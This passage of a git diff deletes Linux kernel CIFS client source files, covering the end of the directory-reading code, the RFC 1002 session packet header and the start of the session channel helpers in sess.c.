+-	de->namelen = info->FileNameLength;
+-	de->resume_key = info->ResumeKey;
+-}
+-
+-static int cifs_fill_dirent(struct cifs_dirent *de, const void *info,
+-		u16 level, bool is_unicode)
+-{
+-	memset(de, 0, sizeof(*de));
+-
+-	switch (level) {
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		cifs_fill_dirent_posix(de, info);
+-		break;
+-	case SMB_FIND_FILE_UNIX:
+-		cifs_fill_dirent_unix(de, info, is_unicode);
+-		break;
+-	case SMB_FIND_FILE_DIRECTORY_INFO:
+-		cifs_fill_dirent_dir(de, info);
+-		break;
+-	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
+-		cifs_fill_dirent_full(de, info);
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fill_dirent_search(de, info);
+-		break;
+-	case SMB_FIND_FILE_BOTH_DIRECTORY_INFO:
+-		cifs_fill_dirent_both(de, info);
+-		break;
+-	case SMB_FIND_FILE_INFO_STANDARD:
+-		cifs_fill_dirent_std(de, info);
+-		break;
+-	default:
+-		cifs_dbg(FYI, "Unknown findfirst level %d\n", level);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-#define UNICODE_DOT cpu_to_le16(0x2e)
+-
+-/* return 0 if no match and 1 for . (current directory) and 2 for .. (parent) */
+-static int cifs_entry_is_dot(struct cifs_dirent *de, bool is_unicode)
+-{
+-	int rc = 0;
+-
+-	if (!de->name)
+-		return 0;
+-
+-	if (is_unicode) {
+-		__le16 *ufilename = (__le16 *)de->name;
+-		if (de->namelen == 2) {
+-			/* check for . */
+-			if (ufilename[0] == UNICODE_DOT)
+-				rc = 1;
+-		} else if (de->namelen == 4) {
+-			/* check for .. */
+-			if (ufilename[0] == UNICODE_DOT &&
+-			    ufilename[1] == UNICODE_DOT)
+-				rc = 2;
+-		}
+-	} else /* ASCII */ {
+-		if (de->namelen == 1) {
+-			if (de->name[0] == '.')
+-				rc = 1;
+-		} else if (de->namelen == 2) {
+-			if (de->name[0] == '.' && de->name[1] == '.')
+-				rc = 2;
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-/* Check if directory that we are searching has changed so we can decide
+-   whether we can use the cached search results from the previous search */
+-static int is_dir_changed(struct file *file)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct cifsInodeInfo *cifsInfo = CIFS_I(inode);
+-
+-	if (cifsInfo->time == 0)
+-		return 1; /* directory was changed, perhaps due to unlink */
+-	else
+-		return 0;
+-
+-}
+-
+-static int cifs_save_resume_key(const char *current_entry,
+-	struct cifsFileInfo *file_info)
+-{
+-	struct cifs_dirent de;
+-	int rc;
+-
+-	rc = cifs_fill_dirent(&de, current_entry, file_info->srch_inf.info_level,
+-			      file_info->srch_inf.unicode);
+-	if (!rc) {
+-		file_info->srch_inf.presume_name = de.name;
+-		file_info->srch_inf.resume_name_len = de.namelen;
+-		file_info->srch_inf.resume_key = de.resume_key;
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Find the corresponding entry in the search. Note that the SMB server returns
+- * search entries for . and .. which complicates logic here if we choose to
+- * parse for them and we do not assume that they are located in the findfirst
+- * return buffer. We start counting in the buffer with entry 2 and increment for
+- * every entry (do not increment for . or .. entry).
+- */
+-static int
+-find_cifs_entry(const unsigned int xid, struct cifs_tcon *tcon, loff_t pos,
+-		struct file *file, const char *full_path,
+-		char **current_entry, int *num_to_ret)
+-{
+-	__u16 search_flags;
+-	int rc = 0;
+-	int pos_in_buf = 0;
+-	loff_t first_entry_in_buffer;
+-	loff_t index_to_find = pos;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	/* check if index in the buffer */
+-
+-	if (!server->ops->query_dir_first || !server->ops->query_dir_next)
+-		return -ENOSYS;
+-
+-	if ((cfile == NULL) || (current_entry == NULL) || (num_to_ret == NULL))
+-		return -ENOENT;
+-
+-	*current_entry = NULL;
+-	first_entry_in_buffer = cfile->srch_inf.index_of_last_entry -
+-					cfile->srch_inf.entries_in_buffer;
+-
+-	/*
+-	 * If first entry in buf is zero then is first buffer
+-	 * in search response data which means it is likely . and ..
+-	 * will be in this buffer, although some servers do not return
+-	 * . and .. for the root of a drive and for those we need
+-	 * to start two entries earlier.
+-	 */
+-
+-	dump_cifs_file_struct(file, "In fce ");
+-	if (((index_to_find < cfile->srch_inf.index_of_last_entry) &&
+-	     is_dir_changed(file)) || (index_to_find < first_entry_in_buffer)) {
+-		/* close and restart search */
+-		cifs_dbg(FYI, "search backing up - close and restart search\n");
+-		spin_lock(&cfile->file_info_lock);
+-		if (server->ops->dir_needs_close(cfile)) {
+-			cfile->invalidHandle = true;
+-			spin_unlock(&cfile->file_info_lock);
+-			if (server->ops->close_dir)
+-				server->ops->close_dir(xid, tcon, &cfile->fid);
+-		} else
+-			spin_unlock(&cfile->file_info_lock);
+-		if (cfile->srch_inf.ntwrk_buf_start) {
+-			cifs_dbg(FYI, "freeing SMB ff cache buf on search rewind\n");
+-			if (cfile->srch_inf.smallBuf)
+-				cifs_small_buf_release(cfile->srch_inf.
+-						ntwrk_buf_start);
+-			else
+-				cifs_buf_release(cfile->srch_inf.
+-						ntwrk_buf_start);
+-			cfile->srch_inf.ntwrk_buf_start = NULL;
+-		}
+-		rc = initiate_cifs_search(xid, file, full_path);
+-		if (rc) {
+-			cifs_dbg(FYI, "error %d reinitiating a search on rewind\n",
+-				 rc);
+-			return rc;
+-		}
+-		/* FindFirst/Next set last_entry to NULL on malformed reply */
+-		if (cfile->srch_inf.last_entry)
+-			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
+-	}
+-
+-	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+-	if (backup_cred(cifs_sb))
+-		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	while ((index_to_find >= cfile->srch_inf.index_of_last_entry) &&
+-	       (rc == 0) && !cfile->srch_inf.endOfSearch) {
+-		cifs_dbg(FYI, "calling findnext2\n");
+-		rc = server->ops->query_dir_next(xid, tcon, &cfile->fid,
+-						 search_flags,
+-						 &cfile->srch_inf);
+-		/* FindFirst/Next set last_entry to NULL on malformed reply */
+-		if (cfile->srch_inf.last_entry)
+-			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
+-		if (rc)
+-			return -ENOENT;
+-	}
+-	if (index_to_find < cfile->srch_inf.index_of_last_entry) {
+-		/* we found the buffer that contains the entry */
+-		/* scan and find it */
+-		int i;
+-		char *cur_ent;
+-		char *end_of_smb;
+-
+-		if (cfile->srch_inf.ntwrk_buf_start == NULL) {
+-			cifs_dbg(VFS, "ntwrk_buf_start is NULL during readdir\n");
+-			return -EIO;
+-		}
+-
+-		end_of_smb = cfile->srch_inf.ntwrk_buf_start +
+-			server->ops->calc_smb_size(
+-					cfile->srch_inf.ntwrk_buf_start);
+-
+-		cur_ent = cfile->srch_inf.srch_entries_start;
+-		first_entry_in_buffer = cfile->srch_inf.index_of_last_entry
+-					- cfile->srch_inf.entries_in_buffer;
+-		pos_in_buf = index_to_find - first_entry_in_buffer;
+-		cifs_dbg(FYI, "found entry - pos_in_buf %d\n", pos_in_buf);
+-
+-		for (i = 0; (i < (pos_in_buf)) && (cur_ent != NULL); i++) {
+-			/* go entry by entry figuring out which is first */
+-			cur_ent = nxt_dir_entry(cur_ent, end_of_smb,
+-						cfile->srch_inf.info_level);
+-		}
+-		if ((cur_ent == NULL) && (i < pos_in_buf)) {
+-			/* BB fixme - check if we should flag this error */
+-			cifs_dbg(VFS, "reached end of buf searching for pos in buf %d index to find %lld rc %d\n",
+-				 pos_in_buf, index_to_find, rc);
+-		}
+-		rc = 0;
+-		*current_entry = cur_ent;
+-	} else {
+-		cifs_dbg(FYI, "index not in buffer - could not findnext into it\n");
+-		return 0;
+-	}
+-
+-	if (pos_in_buf >= cfile->srch_inf.entries_in_buffer) {
+-		cifs_dbg(FYI, "can not return entries pos_in_buf beyond last\n");
+-		*num_to_ret = 0;
+-	} else
+-		*num_to_ret = cfile->srch_inf.entries_in_buffer - pos_in_buf;
+-
+-	return rc;
+-}
+-
+-static bool emit_cached_dirents(struct cached_dirents *cde,
+-				struct dir_context *ctx)
+-{
+-	struct cached_dirent *dirent;
+-	bool rc;
+-
+-	list_for_each_entry(dirent, &cde->entries, entry) {
+-		/*
+-		 * Skip all early entries prior to the current lseek()
+-		 * position.
+-		 */
+-		if (ctx->pos > dirent->pos)
+-			continue;
+-		/*
+-		 * We recorded the current ->pos value for the dirent
+-		 * when we stored it in the cache.
+-		 * However, this sequence of ->pos values may have holes
+-		 * in it, for example dot-dirs returned from the server
+-		 * are suppressed.
+-		 * Handle this bu forcing ctx->pos to be the same as the
+-		 * ->pos of the current dirent we emit from the cache.
+-		 * This means that when we emit these entries from the cache
+-		 * we now emit them with the same ->pos value as in the
+-		 * initial scan.
+-		 */
+-		ctx->pos = dirent->pos;
+-		rc = dir_emit(ctx, dirent->name, dirent->namelen,
+-			      dirent->fattr.cf_uniqueid,
+-			      dirent->fattr.cf_dtype);
+-		if (!rc)
+-			return rc;
+-		ctx->pos++;
+-	}
+-	return true;
+-}
+-
+-static void update_cached_dirents_count(struct cached_dirents *cde,
+-					struct dir_context *ctx)
+-{
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-
+-	cde->pos++;
+-}
+-
+-static void finished_cached_dirents_count(struct cached_dirents *cde,
+-					struct dir_context *ctx)
+-{
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-	if (ctx->pos != cde->pos)
+-		return;
+-
+-	cde->is_valid = 1;
+-}
+-
+-static void add_cached_dirent(struct cached_dirents *cde,
+-			      struct dir_context *ctx,
+-			      const char *name, int namelen,
+-			      struct cifs_fattr *fattr)
+-{
+-	struct cached_dirent *de;
+-
+-	if (cde->ctx != ctx)
+-		return;
+-	if (cde->is_valid || cde->is_failed)
+-		return;
+-	if (ctx->pos != cde->pos) {
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de = kzalloc(sizeof(*de), GFP_ATOMIC);
+-	if (de == NULL) {
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de->namelen = namelen;
+-	de->name = kstrndup(name, namelen, GFP_ATOMIC);
+-	if (de->name == NULL) {
+-		kfree(de);
+-		cde->is_failed = 1;
+-		return;
+-	}
+-	de->pos = ctx->pos;
+-
+-	memcpy(&de->fattr, fattr, sizeof(struct cifs_fattr));
+-
+-	list_add_tail(&de->entry, &cde->entries);
+-}
+-
+-static bool cifs_dir_emit(struct dir_context *ctx,
+-			  const char *name, int namelen,
+-			  struct cifs_fattr *fattr,
+-			  struct cached_fid *cfid)
+-{
+-	bool rc;
+-	ino_t ino = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
+-
+-	rc = dir_emit(ctx, name, namelen, ino, fattr->cf_dtype);
+-	if (!rc)
+-		return rc;
+-
+-	if (cfid) {
+-		mutex_lock(&cfid->dirents.de_mutex);
+-		add_cached_dirent(&cfid->dirents, ctx, name, namelen,
+-				  fattr);
+-		mutex_unlock(&cfid->dirents.de_mutex);
+-	}
+-
+-	return rc;
+-}
+-
+-static int cifs_filldir(char *find_entry, struct file *file,
+-			struct dir_context *ctx,
+-			char *scratch_buf, unsigned int max_len,
+-			struct cached_fid *cfid)
+-{
+-	struct cifsFileInfo *file_info = file->private_data;
+-	struct super_block *sb = file_inode(file)->i_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_dirent de = { NULL, };
+-	struct cifs_fattr fattr;
+-	struct qstr name;
+-	int rc = 0;
+-
+-	rc = cifs_fill_dirent(&de, find_entry, file_info->srch_inf.info_level,
+-			      file_info->srch_inf.unicode);
+-	if (rc)
+-		return rc;
+-
+-	if (de.namelen > max_len) {
+-		cifs_dbg(VFS, "bad search response length %zd past smb end\n",
+-			 de.namelen);
+-		return -EINVAL;
+-	}
+-
+-	/* skip . and .. since we added them first */
+-	if (cifs_entry_is_dot(&de, file_info->srch_inf.unicode))
+-		return 0;
+-
+-	if (file_info->srch_inf.unicode) {
+-		struct nls_table *nlt = cifs_sb->local_nls;
+-		int map_type;
+-
+-		map_type = cifs_remap(cifs_sb);
+-		name.name = scratch_buf;
+-		name.len =
+-			cifs_from_utf16((char *)name.name, (__le16 *)de.name,
+-					UNICODE_NAME_MAX,
+-					min_t(size_t, de.namelen,
+-					      (size_t)max_len), nlt, map_type);
+-		name.len -= nls_nullsize(nlt);
+-	} else {
+-		name.name = de.name;
+-		name.len = de.namelen;
+-	}
+-
+-	switch (file_info->srch_inf.info_level) {
+-	case SMB_FIND_FILE_POSIX_INFO:
+-		cifs_posix_to_fattr(&fattr,
+-				    (struct smb2_posix_info *)find_entry,
+-				    cifs_sb);
+-		break;
+-	case SMB_FIND_FILE_UNIX:
+-		cifs_unix_basic_to_fattr(&fattr,
+-					 &((FILE_UNIX_INFO *)find_entry)->basic,
+-					 cifs_sb);
+-		if (S_ISLNK(fattr.cf_mode))
+-			fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-		break;
+-	case SMB_FIND_FILE_INFO_STANDARD:
+-		cifs_std_info_to_fattr(&fattr,
+-				       (FIND_FILE_STANDARD_INFO *)find_entry,
+-				       cifs_sb);
+-		break;
+-	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fulldir_info_to_fattr(&fattr,
+-					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
+-					   cifs_sb);
+-		break;
+-	default:
+-		cifs_dir_info_to_fattr(&fattr,
+-				       (FILE_DIRECTORY_INFO *)find_entry,
+-				       cifs_sb);
+-		break;
+-	}
+-
+-	if (de.ino && (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		fattr.cf_uniqueid = de.ino;
+-	} else {
+-		fattr.cf_uniqueid = iunique(sb, ROOT_I);
+-		cifs_autodisable_serverino(cifs_sb);
+-	}
+-
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) &&
+-	    couldbe_mf_symlink(&fattr))
+-		/*
+-		 * trying to get the type and mode can be slow,
+-		 * so just call those regular files for now, and mark
+-		 * for reval
+-		 */
+-		fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	cifs_prime_dcache(file_dentry(file), &name, &fattr);
+-
+-	return !cifs_dir_emit(ctx, name.name, name.len,
+-			      &fattr, cfid);
+-}
+-
+-
+-int cifs_readdir(struct file *file, struct dir_context *ctx)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	int i;
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-	struct cifsFileInfo *cifsFile;
+-	char *current_entry;
+-	int num_to_fill = 0;
+-	char *tmp_buf = NULL;
+-	char *end_of_smb;
+-	unsigned int max_len;
+-	const char *full_path;
+-	void *page = alloc_dentry_path();
+-	struct cached_fid *cfid = NULL;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(file_dentry(file), page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto rddir2_exit;
+-	}
+-
+-	if (file->private_data == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			goto cache_not_found;
+-		tcon = tlink_tcon(tlink);
+-	} else {
+-		cifsFile = file->private_data;
+-		tcon = tlink_tcon(cifsFile->tlink);
+-	}
+-
+-	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	cifs_put_tlink(tlink);
+-	if (rc)
+-		goto cache_not_found;
+-
+-	mutex_lock(&cfid->dirents.de_mutex);
+-	/*
+-	 * If this was reading from the start of the directory
+-	 * we need to initialize scanning and storing the
+-	 * directory content.
+-	 */
+-	if (ctx->pos == 0 && cfid->dirents.ctx == NULL) {
+-		cfid->dirents.ctx = ctx;
+-		cfid->dirents.pos = 2;
+-	}
+-	/*
+-	 * If we already have the entire directory cached then
+-	 * we can just serve the cache.
+-	 */
+-	if (cfid->dirents.is_valid) {
+-		if (!dir_emit_dots(file, ctx)) {
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-			goto rddir2_exit;
+-		}
+-		emit_cached_dirents(&cfid->dirents, ctx);
+-		mutex_unlock(&cfid->dirents.de_mutex);
+-		goto rddir2_exit;
+-	}
+-	mutex_unlock(&cfid->dirents.de_mutex);
+-
+-	/* Drop the cache while calling initiate_cifs_search and
+-	 * find_cifs_entry in case there will be reconnects during
+-	 * query_directory.
+-	 */
+-	close_cached_dir(cfid);
+-	cfid = NULL;
+-
+- cache_not_found:
+-	/*
+-	 * Ensure FindFirst doesn't fail before doing filldir() for '.' and
+-	 * '..'. Otherwise we won't be able to notify VFS in case of failure.
+-	 */
+-	if (file->private_data == NULL) {
+-		rc = initiate_cifs_search(xid, file, full_path);
+-		cifs_dbg(FYI, "initiate cifs search rc %d\n", rc);
+-		if (rc)
+-			goto rddir2_exit;
+-	}
+-
+-	if (!dir_emit_dots(file, ctx))
+-		goto rddir2_exit;
+-
+-	/* 1) If search is active,
+-		is in current search buffer?
+-		if it before then restart search
+-		if after then keep searching till find it */
+-	cifsFile = file->private_data;
+-	if (cifsFile->srch_inf.endOfSearch) {
+-		if (cifsFile->srch_inf.emptyDir) {
+-			cifs_dbg(FYI, "End of search, empty dir\n");
+-			rc = 0;
+-			goto rddir2_exit;
+-		}
+-	} /* else {
+-		cifsFile->invalidHandle = true;
+-		tcon->ses->server->close(xid, tcon, &cifsFile->fid);
+-	} */
+-
+-	tcon = tlink_tcon(cifsFile->tlink);
+-	rc = find_cifs_entry(xid, tcon, ctx->pos, file, full_path,
+-			     &current_entry, &num_to_fill);
+-	open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
+-	if (rc) {
+-		cifs_dbg(FYI, "fce error %d\n", rc);
+-		goto rddir2_exit;
+-	} else if (current_entry != NULL) {
+-		cifs_dbg(FYI, "entry %lld found\n", ctx->pos);
+-	} else {
+-		if (cfid) {
+-			mutex_lock(&cfid->dirents.de_mutex);
+-			finished_cached_dirents_count(&cfid->dirents, ctx);
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-		}
+-		cifs_dbg(FYI, "Could not find entry\n");
+-		goto rddir2_exit;
+-	}
+-	cifs_dbg(FYI, "loop through %d times filling dir for net buf %p\n",
+-		 num_to_fill, cifsFile->srch_inf.ntwrk_buf_start);
+-	max_len = tcon->ses->server->ops->calc_smb_size(
+-			cifsFile->srch_inf.ntwrk_buf_start);
+-	end_of_smb = cifsFile->srch_inf.ntwrk_buf_start + max_len;
+-
+-	tmp_buf = kmalloc(UNICODE_NAME_MAX, GFP_KERNEL);
+-	if (tmp_buf == NULL) {
+-		rc = -ENOMEM;
+-		goto rddir2_exit;
+-	}
+-
+-	for (i = 0; i < num_to_fill; i++) {
+-		if (current_entry == NULL) {
+-			/* evaluate whether this case is an error */
+-			cifs_dbg(VFS, "past SMB end,  num to fill %d i %d\n",
+-				 num_to_fill, i);
+-			break;
+-		}
+-		/*
+-		 * if buggy server returns . and .. late do we want to
+-		 * check for that here?
+-		 */
+-		*tmp_buf = 0;
+-		rc = cifs_filldir(current_entry, file, ctx,
+-				  tmp_buf, max_len, cfid);
+-		if (rc) {
+-			if (rc > 0)
+-				rc = 0;
+-			break;
+-		}
+-
+-		ctx->pos++;
+-		if (cfid) {
+-			mutex_lock(&cfid->dirents.de_mutex);
+-			update_cached_dirents_count(&cfid->dirents, ctx);
+-			mutex_unlock(&cfid->dirents.de_mutex);
+-		}
+-
+-		if (ctx->pos ==
+-			cifsFile->srch_inf.index_of_last_entry) {
+-			cifs_dbg(FYI, "last entry in buf at pos %lld %s\n",
+-				 ctx->pos, tmp_buf);
+-			cifs_save_resume_key(current_entry, cifsFile);
+-			break;
+-		}
+-		current_entry =
+-			nxt_dir_entry(current_entry, end_of_smb,
+-				      cifsFile->srch_inf.info_level);
+-	}
+-	kfree(tmp_buf);
+-
+-rddir2_exit:
+-	if (cfid)
+-		close_cached_dir(cfid);
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	return rc;
+-}
+diff --git a/fs/cifs/rfc1002pdu.h b/fs/cifs/rfc1002pdu.h
+deleted file mode 100644
+index ae1d025da294a..0000000000000
+--- a/fs/cifs/rfc1002pdu.h
++++ /dev/null
+@@ -1,61 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Protocol Data Unit definitions for RFC 1001/1002 support
+- *
+- *   Copyright (c) International Business Machines  Corp., 2004
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/* NB: unlike smb/cifs packets, the RFC1002 structures are big endian */
+-
+-	/* RFC 1002 session packet types */
+-#define RFC1002_SESSION_MESSAGE 0x00
+-#define RFC1002_SESSION_REQUEST  0x81
+-#define RFC1002_POSITIVE_SESSION_RESPONSE 0x82
+-#define RFC1002_NEGATIVE_SESSION_RESPONSE 0x83
+-#define RFC1002_RETARGET_SESSION_RESPONSE 0x84
+-#define RFC1002_SESSION_KEEP_ALIVE 0x85
+-
+-	/* RFC 1002 flags (only one defined */
+-#define RFC1002_LENGTH_EXTEND 0x80 /* high order bit of length (ie +64K) */
+-
+-struct rfc1002_session_packet {
+-	__u8	type;
+-	__u8	flags;
+-	__u16	length;
+-	union {
+-		struct {
+-			__u8 called_len;
+-			__u8 called_name[32];
+-			__u8 scope1; /* null */
+-			__u8 calling_len;
+-			__u8 calling_name[32];
+-			__u8 scope2; /* null */
+-		} __attribute__((packed)) session_req;
+-		struct {
+-			__u32 retarget_ip_addr;
+-			__u16 port;
+-		} __attribute__((packed)) retarget_resp;
+-		__u8 neg_ses_resp_error_code;
+-		/* POSITIVE_SESSION_RESPONSE packet does not include trailer.
+-		SESSION_KEEP_ALIVE packet also does not include a trailer.
+-		Trailer for the SESSION_MESSAGE packet is SMB/CIFS header */
+-	} __attribute__((packed)) trailer;
+-} __attribute__((packed));
+-
+-/* Negative Session Response error codes */
+-#define RFC1002_NOT_LISTENING_CALLED  0x80 /* not listening on called name */
+-#define RFC1002_NOT_LISTENING_CALLING 0x81 /* not listening on calling name */
+-#define RFC1002_NOT_PRESENT           0x82 /* called name not present */
+-#define RFC1002_INSUFFICIENT_RESOURCE 0x83
+-#define RFC1002_UNSPECIFIED_ERROR     0x8F
+-
+-/* RFC 1002 Datagram service packets are not defined here as they
+-are not needed for the network filesystem client unless we plan on
+-implementing broadcast resolution of the server ip address (from
+-server netbios name). Currently server names are resolved only via DNS
+-(tcp name) or ip address or an /etc/hosts equivalent mapping to ip address.*/
+-
+-#define DEFAULT_CIFS_CALLED_NAME  "*SMBSERVER      "
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+deleted file mode 100644
+index 81be17845072a..0000000000000
+--- a/fs/cifs/sess.c
++++ /dev/null
+@@ -1,1858 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   SMB/CIFS session setup handling routines
+- *
+- *   Copyright (c) International Business Machines  Corp., 2006, 2009
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include <linux/utsname.h>
+-#include <linux/slab.h>
+-#include <linux/version.h>
+-#include "cifsfs.h"
+-#include "cifs_spnego.h"
+-#include "smb2proto.h"
+-#include "fs_context.h"
+-
+-static int
+-cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-		     struct cifs_server_iface *iface);
+-
+-bool
+-is_server_using_iface(struct TCP_Server_Info *server,
+-		      struct cifs_server_iface *iface)
+-{
+-	struct sockaddr_in *i4 = (struct sockaddr_in *)&iface->sockaddr;
+-	struct sockaddr_in6 *i6 = (struct sockaddr_in6 *)&iface->sockaddr;
+-	struct sockaddr_in *s4 = (struct sockaddr_in *)&server->dstaddr;
+-	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-	if (server->dstaddr.ss_family != iface->sockaddr.ss_family)
+-		return false;
+-	if (server->dstaddr.ss_family == AF_INET) {
+-		if (s4->sin_addr.s_addr != i4->sin_addr.s_addr)
+-			return false;
+-	} else if (server->dstaddr.ss_family == AF_INET6) {
+-		if (memcmp(&s6->sin6_addr, &i6->sin6_addr,
+-			   sizeof(i6->sin6_addr)) != 0)
+-			return false;
+-	} else {
+-		/* unknown family.. */
+-		return false;
+-	}
+-	return true;
+-}
+-
+-bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface)
+-{
+-	int i;
+-
+-	spin_lock(&ses->chan_lock);
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].iface == iface) {
+-			spin_unlock(&ses->chan_lock);
+-			return true;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	return false;
+-}
+-
+-/* channel helper functions. assumed that chan_lock is held by caller. */
+-
+-unsigned int
+-cifs_ses_get_chan_index(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < ses->chan_count; i++) {
+-		if (ses->chans[i].server == server)
+-			return i;
+-	}
+-
+-	/* If we didn't find the channel, it is likely a bug */
+-	if (server)
+-		cifs_dbg(VFS, "unable to get chan index for server: 0x%llx",
+-			 server->conn_id);
+-	WARN_ON(1);
+-	return 0;
+-}
+-
+-void
+-cifs_chan_set_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	ses->chans[chan_index].in_reconnect = true;
+-}
+-
+-void
+-cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	ses->chans[chan_index].in_reconnect = false;
+-}
+-
+-bool
+-cifs_chan_in_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return CIFS_CHAN_IN_RECONNECT(ses, chan_index);
+-}
+-
+-void
+-cifs_chan_set_need_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	set_bit(chan_index, &ses->chans_need_reconnect);
+-	cifs_dbg(FYI, "Set reconnect bitmask for chan %u; now 0x%lx\n",
+-		 chan_index, ses->chans_need_reconnect);
+-}
+-
+-void
+-cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	clear_bit(chan_index, &ses->chans_need_reconnect);
+-	cifs_dbg(FYI, "Cleared reconnect bitmask for chan %u; now 0x%lx\n",
+-		 chan_index, ses->chans_need_reconnect);
+-}
+-
+-bool
+-cifs_chan_needs_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return CIFS_CHAN_NEEDS_RECONNECT(ses, chan_index);
+-}
+-
+-bool
+-cifs_chan_is_iface_active(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-{
+-	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
+-
+-	return ses->chans[chan_index].iface &&
+-		ses->chans[chan_index].iface->is_active;
+-}
+-
+-/* returns number of channels added */
+-int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+-{
+-	struct TCP_Server_Info *server = ses->server;
+-	int old_chan_count, new_chan_count;
+-	int left;
+-	int rc = 0;
+-	int tries = 0;
+-	struct cifs_server_iface *iface = NULL, *niface = NULL;
+-
+-	spin_lock(&ses->chan_lock);
+-
+-	new_chan_count = old_chan_count = ses->chan_count;
+-	left = ses->chan_max - ses->chan_count;
+-
+-	if (left <= 0) {
+-		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(FYI,
+-			 "ses already at max_channels (%zu), nothing to open\n",
+-			 ses->chan_max);
+-		return 0;
+-	}
+-
+-	if (server->dialect < SMB30_PROT_ID) {
+-		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+-		return 0;
+-	}
+-
+-	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		ses->chan_max = 1;
+-		spin_unlock(&ses->chan_lock);
+-		cifs_server_dbg(VFS, "no multichannel support\n");
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	/*
+-	 * Keep connecting to same, fastest, iface for all channels as
+-	 * long as its RSS. Try next fastest one if not RSS or channel
+-	 * creation fails.
+-	 */
+-	spin_lock(&ses->iface_lock);
+-	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
+-				 iface_head);
+-	spin_unlock(&ses->iface_lock);
+-
+-	while (left > 0) {
+-
+-		tries++;
+-		if (tries > 3*ses->chan_max) {
+-			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
+-				 left);
+-			break;
+-		}
+-
+-		spin_lock(&ses->iface_lock);
+-		if (!ses->iface_count) {
+-			spin_unlock(&ses->iface_lock);
+-			break;
+-		}
+-
